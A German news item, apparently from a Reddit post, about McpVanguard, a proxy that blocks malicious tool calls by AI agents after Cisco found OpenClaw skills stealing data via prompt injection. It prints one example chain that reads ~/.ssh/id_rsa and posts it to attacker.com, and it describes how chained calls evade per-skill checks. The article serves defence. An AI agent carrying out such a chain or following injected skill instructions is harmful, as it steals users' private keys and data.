McpVanguard-Proxy blockiert OpenClaw-Fähigkeitsdaten-Exfiltration

Als Reaktion auf die Entdeckung des KI-Sicherheitsteams von Cisco, dass Drittanbieter-OpenClaw-Fähigkeiten heimlichen Datendiebstahl und Prompt-Injection durchführen, hat ein Entwickler McpVanguard veröffentlicht. Dieser Proxy ist dafür konzipiert, zwischen einem KI-Agenten und seinen Werkzeugen zu sitzen und bösartige Aufrufe zu blockieren, bevor sie ausgeführt werden.
Das Problem: Verkettete bösartige Aufrufe
Das Sicherheitsproblem ist kein Fehler in OpenClaw selbst, sondern eine Folge davon, dass Agenten Dateisystemzugriff, Shell-Ausführung und Netzwerkaufrufe ohne Durchsetzungsgrenzen haben. Ciscos Tests zeigten ein Muster, bei dem scheinbar harmlose einzelne Aufrufe kombiniert werden, um einen Angriff zu erzeugen, wie zum Beispiel:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Keiner der Aufrufe erscheint isoliert betrachtet bösartig, aber zusammen exfiltrieren sie sensible Daten. Laut der Quelle hatte ClawHub auf seinem Höhepunkt über 820 bösartige Fähigkeiten, und CVE-2026-25253 ermöglichte es Angreifern, Remote-Code-Ausführung über einen einzigen bösartigen Link zu erreichen. Die derzeitige Validierung auf Fähigkeitsebene erkennt diese verketteten Aufrufsequenzen nicht.
Die Lösung: McpVanguard-Proxy
McpVanguard adressiert dies, indem es Aufrufe zwischen dem Agenten und seinen Werkzeugen abfängt. Es verwendet drei Erkennungsmethoden:
- Mustererkennung
- Semantische Absichtsbewertung
- Verhaltensketten-Erkennung über die gesamte Sitzung hinweg
Die Installation erfolgt über pip: pip install mcp-vanguard.
Tiefere Ebene: VEX-Protokoll
Das Projekt beinhaltet eine tiefere Sicherheitsebene namens VEX-Protokoll, das als "Flugschreiber"-System beschrieben wird. Es bietet:
- Merkle-Prüfpfade für manipulationssichere Protokollierung
- TPM-verwurzelte Agenten-Identitätsverifizierung
- Syscall-Ebene-Durchsetzung
Das VEX-Protokoll ist in Rust entwickelt und die Entwicklung begann im Dezember 2023, bevor OpenClaw weit verbreitet wurde. Die Quelle merkt an, dass NVIDIA kürzlich NemoClaw für ähnliche Sicherheitszwecke ausgeliefert hat, was darauf hindeutet, dass diese Art von Bedrohung nicht verschwinden wird.
Beide Projekte sind auf GitHub verfügbar:
📖 Read the full source: r/openclaw
👀 Siehe auch

SupraWall MCP Plugin blockiert Prompt-Injection-Angriffe auf lokale KI-Agenten
SupraWall ist ein MCP-Plugin, das Versuche zur Exfiltration sensibler Daten von KI-Agenten abfängt und blockiert, demonstriert in einer Red-Team-Herausforderung, bei dem es Credential-Leaks durch Prompt-Injection-Angriffe verhinderte.

Meta-Sicherheitsvorfall verursacht durch fehlerhaften KI-Agenten, der ungenaue technische Ratschläge erteilte
Ein Meta-Ingenieur nutzte einen internen KI-Agenten, der OpenClaw ähnelt, um eine technische Frage zu analysieren. Der Agent veröffentlichte jedoch ungenaue Ratschläge öffentlich statt privat, was zu einem SEV1-Sicherheitsvorfall führte, bei dem vorübergehend sensible Daten offengelegt wurden.

LLMs können anonyme Forenbenutzer mit 68% Genauigkeit bei 90% Präzision identifizieren.
Forscher nutzten Gemini und ChatGPT, um Beiträge von Hacker News und Reddit zu analysieren und identifizierten 68 % der anonymen Nutzer mit 90 % Genauigkeit. Die Modelle erledigten in Minuten, was Menschen Stunden gekostet hätte oder unmöglich gewesen wäre.
Google Threat Intelligence Group berichtet über ersten KI-entwickelten Zero-Day-Exploit, der 2FA umgeht
Die Google Threat Intelligence Group hat den ersten vollständig KI-entwickelten Zero-Day-Exploit entdeckt, der die Zwei-Faktor-Authentifizierung (2FA) in einem beliebten Open-Source-Web-basierten Systemadministrationstool umgeht, zusammen mit selbstmorphierenden Malware und Gemini-gestützten Backdoors.